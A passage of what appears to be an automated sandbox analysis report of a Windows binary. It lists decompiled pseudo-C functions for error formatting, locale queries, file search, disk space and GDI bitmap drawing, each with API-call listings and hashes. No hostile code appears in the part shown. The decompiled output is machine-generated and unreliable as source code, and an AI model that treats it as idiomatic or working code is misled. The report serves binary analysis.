                                                                        				_push(_t32);
                                                                        				_push(0x420b1c);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t32 + 0xfffffefc;
                                                                        				_t21 = GetLastError();
                                                                        				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
                                                                        					E00420A2C(_t22);
                                                                        				} else {
                                                                        					E004045B0( &_v264, 0x100,  &_v260);
                                                                        					E0040A17C(_v264, 1);
                                                                        					E00403DA8();
                                                                        				}
                                                                        				_pop(_t27);
                                                                        				 *[fs:eax] = _t27;
                                                                        				_push(E00420B23);
                                                                        				return E00404348( &_v264);
                                                                        			}










                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,00420B1C,?,00000000,?,00420B34,00000000,0042411B,00000000,00000000,004242BB,?,00000000,?,?), ref: 00420AA0
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00420B1C,?,00000000,?,00420B34,00000000,0042411B,00000000), ref: 00420AC6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ErrorFormatLastMessage
                                                                        • String ID:
                                                                        • API String ID: 3479602957-0
                                                                        • Opcode ID: 6838e39e97c1f34c2ece11ce19f9ae0e55e91045b487aa8bd30817d389b3f453
                                                                        • Instruction ID: a7e0326648665491cf35c585204d71cbec4fadd530319c3be2108fcfe5b4c816
                                                                        • Opcode Fuzzy Hash: 6838e39e97c1f34c2ece11ce19f9ae0e55e91045b487aa8bd30817d389b3f453
                                                                        • Instruction Fuzzy Hash: E101D4703443185FE721EB619C92BE677EC9B58708F9100BAB644A62C2DEF86D808959
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 46%
                                                                        			E0040AD50(int __eax, void* __ebx, void* __eflags) {
                                                                        				char _v11;
                                                                        				char _v16;
                                                                        				intOrPtr _t28;
                                                                        				void* _t31;
                                                                        				void* _t33;
                                                                        
                                                                        				_t33 = __eflags;
                                                                        				_v16 = 0;
                                                                        				_push(_t31);
                                                                        				_push(0x40adb4);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t31 + 0xfffffff4;
                                                                        				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
                                                                        				E004045B0( &_v16, 7,  &_v11);
                                                                        				_push(_v16);
                                                                        				E004087C0(7, GetACP(), _t33);
                                                                        				_pop(_t28);
                                                                        				 *[fs:eax] = _t28;
                                                                        				_push(E0040ADBB);
                                                                        				return E00404348( &_v16);
                                                                        			}








                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040ADB4), ref: 0040AD76
                                                                        • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040ADB4), ref: 0040AD8F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: 01b31bc8a1b5dac8776ab9d8f92ab82c230197195aca289df6b40fc05eb71f23
                                                                        • Instruction ID: f7aee971aabc4a8eaaa558cbc6123ec81126d331191583c2179f3b6fc9b9f086
                                                                        • Opcode Fuzzy Hash: 01b31bc8a1b5dac8776ab9d8f92ab82c230197195aca289df6b40fc05eb71f23
                                                                        • Instruction Fuzzy Hash: 2AF0F675E04308BFE700EBE2CC4299EB3ABDBC4718F50C47AB610A3AC0EA7C65148658
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004089B8(void* __eax, WORD* __ecx, signed int __edx) {
                                                                        				WORD* _t15;
                                                                        				void* _t21;
                                                                        				long _t22;
                                                                        
                                                                        				_t15 = __ecx;
                                                                        				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
                                                                        				_t21 = FindFirstFileA(E004047F8(__eax), __ecx + 0x18);
                                                                        				 *((intOrPtr*)(_t15 + 0x14)) = _t21;
                                                                        				if(_t21 == 0xffffffff) {
                                                                        					_t22 = GetLastError();
                                                                        				} else {
                                                                        					_t22 = E00408954(_t15);
                                                                        					if(_t22 != 0) {
                                                                        						E00408A2C(_t15);
                                                                        					}
                                                                        				}
                                                                        				return _t22;
                                                                        			}






                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00465E52,00000000,00465FCC,?,00000000,00465FF4), ref: 004089D3
                                                                        • GetLastError.KERNEL32(00000000,?,?,?,?,00465E52,00000000,00465FCC,?,00000000,00465FF4), ref: 004089F8
                                                                          • Part of subcall function 00408954: FileTimeToLocalFileTime.KERNEL32(?), ref: 00408981
                                                                          • Part of subcall function 00408954: FileTimeToDosDateTime.KERNEL32 ref: 00408990
                                                                          • Part of subcall function 00408A2C: FindClose.KERNEL32(?,?,004089F6,00000000,?,?,?,?,00465E52,00000000,00465FCC,?,00000000,00465FF4), ref: 00408A38
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                                                        • String ID:
                                                                        • API String ID: 976985129-0
                                                                        • Opcode ID: 19c777b74b7e602315d21aafcbf4c490357a5b7749ace5ad930647ac6ae3a4a6
                                                                        • Instruction ID: 2fdbdee162175b761896c87037c5b9f9377ba6162d2e3e0bb2753c189c1fa674
                                                                        • Opcode Fuzzy Hash: 19c777b74b7e602315d21aafcbf4c490357a5b7749ace5ad930647ac6ae3a4a6
                                                                        • Instruction Fuzzy Hash: 3EE0A0B2B011200787547A6E088106A61C84A8436430A037FB8A4FB383CE38CC1253AE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00408B82(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                        				long _v8;
                                                                        				long _v12;
                                                                        				long _v16;
                                                                        				long _v20;
                                                                        				intOrPtr _v24;
                                                                        				signed int _v28;
                                                                        				CHAR* _t25;
                                                                        				int _t26;
                                                                        				intOrPtr _t31;
                                                                        				intOrPtr _t34;
                                                                        				intOrPtr* _t39;
                                                                        				intOrPtr* _t40;
                                                                        				intOrPtr _t48;
                                                                        				intOrPtr _t50;
                                                                        
                                                                        				_t25 = _a4;
                                                                        				if(_t25 == 0) {
                                                                        					_t25 = 0;
                                                                        				}
                                                                        				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                                                        				_v28 = _v8 * _v12;
                                                                        				_v24 = 0;
                                                                        				_t48 = _v24;
                                                                        				_t31 = E004052D8(_v28, _t48, _v16, 0);
                                                                        				_t39 = _a8;
                                                                        				 *_t39 = _t31;
                                                                        				 *((intOrPtr*)(_t39 + 4)) = _t48;
                                                                        				_t50 = _v24;
                                                                        				_t34 = E004052D8(_v28, _t50, _v20, 0);
                                                                        				_t40 = _a12;
                                                                        				 *_t40 = _t34;
                                                                        				 *((intOrPtr*)(_t40 + 4)) = _t50;
                                                                        				return _t26;
                                                                        			}

















                                                                        APIs
                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00408BA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: DiskFreeSpace
                                                                        • String ID:
                                                                        • API String ID: 1705453755-0
                                                                        • Opcode ID: 8c3c27e9755346353a045cf5bdeb0cfb662459817c7037a9d861ed42329773fe
                                                                        • Instruction ID: de1650325fe5397c084f4a6593de8e898784f8a230013e31698277919b13c4d8
                                                                        • Opcode Fuzzy Hash: 8c3c27e9755346353a045cf5bdeb0cfb662459817c7037a9d861ed42329773fe
                                                                        • Instruction Fuzzy Hash: 8911C0B5A00209AFDB44CFA9C9819FFB7F9EFC8304B14C569A505E7255E6319E018BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E0042E904(intOrPtr __eax, intOrPtr* __edx) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _t12;
                                                                        				intOrPtr _t21;
                                                                        				intOrPtr _t22;
                                                                        				intOrPtr _t25;
                                                                        
                                                                        				_v8 = __eax;
                                                                        				_t22 =  *__edx;
                                                                        				_t26 = _t22 - 0x113;
                                                                        				if(_t22 != 0x113) {
                                                                        					_push( *((intOrPtr*)(__edx + 8)));
                                                                        					_push( *((intOrPtr*)(__edx + 4)));
                                                                        					_push(_t22);
                                                                        					_t12 =  *((intOrPtr*)(_v8 + 0x34));
                                                                        					_push(_t12);
                                                                        					L00406D8C();
                                                                        					 *((intOrPtr*)(__edx + 0xc)) = _t12;
                                                                        					return _t12;
                                                                        				}
                                                                        				_push(0x42e93e);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t25;
                                                                        				E004037D8(_v8, _t26);
                                                                        				_pop(_t21);
                                                                        				 *[fs:eax] = _t21;
                                                                        				return 0;
                                                                        			}








                                                                        APIs
                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042E969
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: NtdllProc_Window
                                                                        • String ID:
                                                                        • API String ID: 4255912815-0
                                                                        • Opcode ID: 9c596d21078fed3a9d89efd8fc4f6a994b7920d476d9afe4056f6d1ffce15fa2
                                                                        • Instruction ID: f9eeb0bd4d7c25621653af731bc53ef1cfa14841bd536920d24b9f13dfd4916e
                                                                        • Opcode Fuzzy Hash: 9c596d21078fed3a9d89efd8fc4f6a994b7920d476d9afe4056f6d1ffce15fa2
                                                                        • Instruction Fuzzy Hash: 6BF096B6704214FFA740DF9BE881C56BBECEB4976035140B7F908D7641D235AD108B74
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00421010(intOrPtr __eax, intOrPtr __edx) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v48;
                                                                        				struct _SYSTEM_INFO* _t17;
                                                                        				unsigned int _t20;
                                                                        				unsigned int _t22;
                                                                        				signed int _t31;
                                                                        				intOrPtr _t33;
                                                                        
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_t17 =  &_v48;
                                                                        				GetSystemInfo(_t17);
                                                                        				_t33 = _v8;
                                                                        				_t31 = _v12 - 1;
                                                                        				if(_t31 >= 0) {
                                                                        					if( *((short*)( &_v48 + 0x20)) == 3) {
                                                                        						do {
                                                                        							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
                                                                        							 *(_t33 + _t31 * 4) = _t20;
                                                                        							_t31 = _t31 - 1;
                                                                        						} while (_t31 >= 0);
                                                                        						return _t20;
                                                                        					} else {
                                                                        						goto L2;
                                                                        					}
                                                                        					do {
                                                                        						L2:
                                                                        						asm("bswap eax");
                                                                        						_t22 =  *(_t33 + _t31 * 4) >> 8;
                                                                        						 *(_t33 + _t31 * 4) = _t22;
                                                                        						_t31 = _t31 - 1;
                                                                        					} while (_t31 >= 0);
                                                                        					return _t22;
                                                                        				}
                                                                        				return _t17;
                                                                        			}











                                                                        APIs
                                                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,004242BB), ref: 00421020
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: InfoSystem
                                                                        • String ID:
                                                                        • API String ID: 31276548-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004099D4(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                                        				char _v260;
                                                                        				intOrPtr _t10;
                                                                        				void* _t18;
                                                                        
                                                                        				_t18 = __ecx;
                                                                        				_t10 = _a4;
                                                                        				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
                                                                        					return E0040439C(_t10, _t18);
                                                                        				}
                                                                        				return E00404438(_t10, _t5 - 1,  &_v260);
                                                                        			}







                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E00409A20(int __eax, char __ecx, int __edx) {
                                                                        				char _v16;
                                                                        				char _t5;
                                                                        				char _t6;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t6 = __ecx;
                                                                        				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                                                                        					_t5 = _t6;
                                                                        				} else {
                                                                        					_t5 = _v16;
                                                                        				}
                                                                        				return _t5;
                                                                        			}







                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B062,00000000,0040B27B,?,?,00000000,00000000), ref: 00409A33
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040697A() {
                                                                        
                                                                        				goto ( *0x4972c4);
                                                                        			}



                                                                        0x0040697c

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004070D2() {
                                                                        
                                                                        				goto ( *0x49754c);
                                                                        			}



                                                                        0x004070d4

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 52%
                                                                        			E00420CCC(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                                                                        				int _v8;
                                                                        				int _v12;
                                                                        				char _v13;
                                                                        				struct HDC__* _v20;
                                                                        				void* _v24;
                                                                        				void* _v28;
                                                                        				long _v32;
                                                                        				long _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr* _t78;
                                                                        				intOrPtr _t87;
                                                                        				struct HDC__* _t88;
                                                                        				intOrPtr _t91;
                                                                        				struct HDC__* _t92;
                                                                        				struct HDC__* _t135;
                                                                        				int _t162;
                                                                        				intOrPtr _t169;
                                                                        				intOrPtr _t171;
                                                                        				struct HDC__* _t173;
                                                                        				int _t175;
                                                                        				void* _t177;
                                                                        				void* _t178;
                                                                        				intOrPtr _t179;
                                                                        
                                                                        				_t177 = _t178;
                                                                        				_t179 = _t178 + 0xffffffdc;
                                                                        				_v12 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t173 = __eax;
                                                                        				_t175 = _a16;
                                                                        				_t162 = _a20;
                                                                        				_v13 = 1;
                                                                        				_t78 =  *0x495c48; // 0x47a0ac
                                                                        				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
                                                                        					_v40 = 0;
                                                                        					_push(0);
                                                                        					L00406AE4();
                                                                        					_v20 = E00420B28(0);
                                                                        					_push(_t177);
                                                                        					_push(0x420f4c);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t179;
                                                                        					_push(_t175);
                                                                        					_push(_t162);
                                                                        					_push(_a32);
                                                                        					L00406ADC();
                                                                        					_v24 = E00420B28(_a32);
                                                                        					_v28 = SelectObject(_v20, _v24);
                                                                        					_push(0);
                                                                        					_t87 =  *0x496a28; // 0xa3080776
                                                                        					_push(_t87);
                                                                        					_t88 = _a32;
                                                                        					_push(_t88);
                                                                        					L00406C5C();
                                                                        					_v40 = _t88;
                                                                        					_push(0);
                                                                        					_push(_v40);
                                                                        					_push(_a32);
                                                                        					L00406C5C();
                                                                        					if(_v40 == 0) {
                                                                        						_push(0xffffffff);
                                                                        						_t91 =  *0x496a28; // 0xa3080776
                                                                        						_push(_t91);
                                                                        						_t92 = _v20;
                                                                        						_push(_t92);
                                                                        						L00406C5C();
                                                                        						_v40 = _t92;
                                                                        					} else {
                                                                        						_push(0xffffffff);
                                                                        						_push(_v40);
                                                                        						_t135 = _v20;
                                                                        						_push(_t135);
                                                                        						L00406C5C();
                                                                        						_v40 = _t135;
                                                                        					}
                                                                        					_push(_v20);
                                                                        					L00406C2C();
                                                                        					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
                                                                        					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
                                                                        					_v32 = SetTextColor(_t173, 0);
                                                                        					_v36 = SetBkColor(_t173, 0xffffff);
                                                                        					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
                                                                        					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
                                                                        					SetTextColor(_t173, _v32);
                                                                        					SetBkColor(_t173, _v36);
                                                                        					if(_v28 != 0) {
                                                                        						SelectObject(_v20, _v28);
                                                                        					}
                                                                        					DeleteObject(_v24);
                                                                        					_pop(_t169);
                                                                        					 *[fs:eax] = _t169;
                                                                        					_push(E00420F53);
                                                                        					if(_v40 != 0) {
                                                                        						_push(0);
                                                                        						_push(_v40);
                                                                        						_push(_v20);
                                                                        						L00406C5C();
                                                                        					}
                                                                        					return DeleteDC(_v20);
                                                                        				} else {
                                                                        					_push(1);
                                                                        					_push(1);
                                                                        					_push(_a32);
                                                                        					L00406ADC();
                                                                        					_v24 = E00420B28(_a32);
                                                                        					_v24 = SelectObject(_a12, _v24);
                                                                        					_push(_t177);
                                                                        					_push(0x420d9f);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t179;
                                                                        					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407308(0xaa0029, 0xcc0020));
                                                                        					_pop(_t171);
                                                                        					 *[fs:eax] = _t171;
                                                                        					_push(E00420F53);
                                                                        					_v24 = SelectObject(_a12, _v24);
                                                                        					return DeleteObject(_v24);
                                                                        				}
                                                                        			}



























                                                                        APIs
                                                                        • 72E7A520.GDI32(?,00000001,00000001,00000000,?,?), ref: 00420D0F
                                                                        • SelectObject.GDI32(?,?), ref: 00420D24
                                                                        • MaskBlt.GDI32(?,?,?,?,?,?,00000000,0042011F,?,?,?,00000000,00000000,00420D9F,?,?), ref: 00420D73
                                                                        • SelectObject.GDI32(?,?), ref: 00420D8D
                                                                        • DeleteObject.GDI32(?), ref: 00420D99
                                                                        • 72E7A590.GDI32(00000000,00000000,?,?), ref: 00420DAD
                                                                        • 72E7A520.GDI32(?,?,?,00000000,00420F4C,?,00000000,00000000,?,?), ref: 00420DCE
                                                                        • SelectObject.GDI32(?,?), ref: 00420DE3
                                                                        • 72E7B410.GDI32(?,A3080776,00000000,?,?,?,?,?,00000000,00420F4C,?,00000000,00000000,?,?), ref: 00420DF7
                                                                        • 72E7B410.GDI32(?,?,00000000,?,A3080776,00000000,?,?,?,?,?,00000000,00420F4C,?,00000000,00000000), ref: 00420E09
                                                                        • 72E7B410.GDI32(?,00000000,000000FF,?,?,00000000,?,A3080776,00000000,?,?,?,?,?,00000000,00420F4C), ref: 00420E1E
                                                                        • 72E7B410.GDI32(?,A3080776,000000FF,?,?,00000000,?,A3080776,00000000,?,?,?,?,?,00000000,00420F4C), ref: 00420E34
                                                                        • 72E7B150.GDI32(?,?,A3080776,000000FF,?,?,00000000,?,A3080776,00000000,?,?,?,?,?,00000000), ref: 00420E40
                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00420E62
                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,0042011F,?,?,00440328), ref: 00420E84
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00420E8C
                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 00420E9A
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00420EC6
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420EEB
                                                                        • SetTextColor.GDI32(?,0042011F), ref: 00420EF5
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00420EFF
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420F12
                                                                        • DeleteObject.GDI32(?), ref: 00420F1B
                                                                        • 72E7B410.GDI32(?,00000000,00000000,00420F53,?,0042011F,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00420F3D
                                                                        • DeleteDC.GDI32(?), ref: 00420F46
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                                                        • String ID:
                                                                        • API String ID: 3348367721-0
                                                                        • Opcode ID: dc01e1ed2023787ed6e24c7143467bd4d3dcb23ac5b5962359c221aa4fe5371a
                                                                        • Instruction ID: 5ed571c653ffefc6f61770c509f2f379e260f00009d4f5806ec2ee285bbd0929
                                                                        • Opcode Fuzzy Hash: dc01e1ed2023787ed6e24c7143467bd4d3dcb23ac5b5962359c221aa4fe5371a
                                                                        • Instruction Fuzzy Hash: D781C3B1A04218AFDB50EFA9CD81EAF77ECEB0D314F114419F618F7281C639AD508B68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 51%
                                                                        			E004240C0(void* __eax, long __ecx, intOrPtr __edx) {
                                                                        				void* _v8;
                                                                        				intOrPtr _v12;
                                                                        				struct HDC__* _v16;
                                                                        				struct HDC__* _v20;
                                                                        				char _v21;
                                                                        				void* _v28;
                                                                        				void* _v32;
                                                                        				intOrPtr _v92;
                                                                        				intOrPtr _v96;
                                                                        				int _v108;
                                                                        				int _v112;
                                                                        				void _v116;
                                                                        				void* _t64;
                                                                        				int _t65;
                                                                        				intOrPtr _t66;
                                                                        				long _t77;
                                                                        				void* _t107;
                                                                        				intOrPtr _t116;
                                                                        				intOrPtr _t117;
                                                                        				long _t120;
                                                                        				intOrPtr _t123;
                                                                        				void* _t127;
                                                                        				void* _t129;
                                                                        				intOrPtr _t130;
                                                                        
                                                                        				_t127 = _t129;
                                                                        				_t130 = _t129 + 0xffffff90;
                                                                        				_t120 = __ecx;
                                                                        				_t123 = __edx;
                                                                        				_t107 = __eax;
                                                                        				_v8 = 0;
                                                                        				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
                                                                        					return _v8;
                                                                        				} else {
                                                                        					E004235B4(_t107);
                                                                        					_v12 = 0;
                                                                        					_v20 = 0;
                                                                        					_push(_t127);
                                                                        					_push(0x4242bb);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t130;
                                                                        					_push(0);
                                                                        					L00406EB4();
                                                                        					_v12 = E00420B28(0);
                                                                        					_push(_v12);
                                                                        					L00406AE4();
                                                                        					_v20 = E00420B28(_v12);
                                                                        					_push(0);
                                                                        					_push(1);
                                                                        					_push(1);
                                                                        					_push(_v108);
                                                                        					_t64 = _v112;
                                                                        					_push(_t64);
                                                                        					L00406ACC();
                                                                        					_v8 = _t64;
                                                                        					if(_v8 == 0) {
                                                                        						L18:
                                                                        						_t65 = 0;
                                                                        						_pop(_t116);
                                                                        						 *[fs:eax] = _t116;
                                                                        						_push(0x4242c2);
                                                                        						if(_v20 != 0) {
                                                                        							_t65 = DeleteDC(_v20);
                                                                        						}
                                                                        						if(_v12 != 0) {
                                                                        							_t66 = _v12;
                                                                        							_push(_t66);
                                                                        							_push(0);
                                                                        							L00407124();
                                                                        							return _t66;
                                                                        						}
                                                                        						return _t65;
                                                                        					} else {
                                                                        						_v32 = SelectObject(_v20, _v8);
                                                                        						if(__ecx != 0x1fffffff) {
                                                                        							_push(_v12);
                                                                        							L00406AE4();
                                                                        							_v16 = E00420B28(_v12);
                                                                        							_push(_t127);
                                                                        							_push(0x424273);
                                                                        							_push( *[fs:eax]);
                                                                        							 *[fs:eax] = _t130;
                                                                        							if(_v96 == 0) {
                                                                        								_v21 = 0;
                                                                        							} else {
                                                                        								_v21 = 1;
                                                                        								_v92 = 0;
                                                                        								_t107 = E004239F8(_t107, _t123, _t123, 0,  &_v116);
                                                                        							}
                                                                        							_v28 = SelectObject(_v16, _t107);
                                                                        							if(_t123 != 0) {
                                                                        								_push(0);
                                                                        								_push(_t123);
                                                                        								_push(_v16);
                                                                        								L00406C5C();
                                                                        								_push(_v16);
                                                                        								L00406C2C();
                                                                        								_push(0);
                                                                        								_push(_t123);
                                                                        								_push(_v20);
                                                                        								L00406C5C();
                                                                        								_push(_v20);
                                                                        								L00406C2C();
                                                                        							}
                                                                        							_t77 = SetBkColor(_v16, _t120);
                                                                        							_push(0xcc0020);
